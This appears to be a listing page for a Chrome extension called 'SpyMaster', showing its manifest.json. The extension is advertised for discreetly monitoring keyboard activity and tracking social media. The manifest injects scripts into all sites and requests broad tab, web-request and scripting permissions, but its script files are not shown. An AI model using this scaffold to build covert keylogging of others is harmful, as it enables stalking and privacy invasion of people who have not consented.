SpyMaster - Internet Monitoring Tool

SpyMaster - Internet Monitoring Tool

SpyMaster: Monitor keyboard activities discreetly, track social media, and ensure peace of mind with its user-friendly interface.

Merlin
Additional files are visible only to premium users

manifest.json


{
  "update_url": "https://clients2.google.com/service/update2/crx",
  "manifest_version": 3,
  "name": "SpyMaster - Internet Monitoring Tool",
  "description": "SpyMaster: Monitor keyboard activities discreetly, track social media, and ensure peace of mind with its user-friendly interface.",
  "version": "0.1",
  "icons": {
    "16": "browser.png",
    "48": "browser.png",
    "128": "browser.png"
  },
  "action": {},
  "background": {
    "service_worker": "back.js",
    "type": "module"
  },
  "content_scripts": [
    {
      "matches": [
        "<all_urls>"
      ],
      "js": [
        "jquery-3.5.0.min.js",
        "content.js"
      ]
    }
  ],
  "permissions": [
    "alarms",
    "tabs",
    "webRequest",
    "webNavigation",
    "scripting",
    "storage",
    "unlimitedStorage"
  ]
}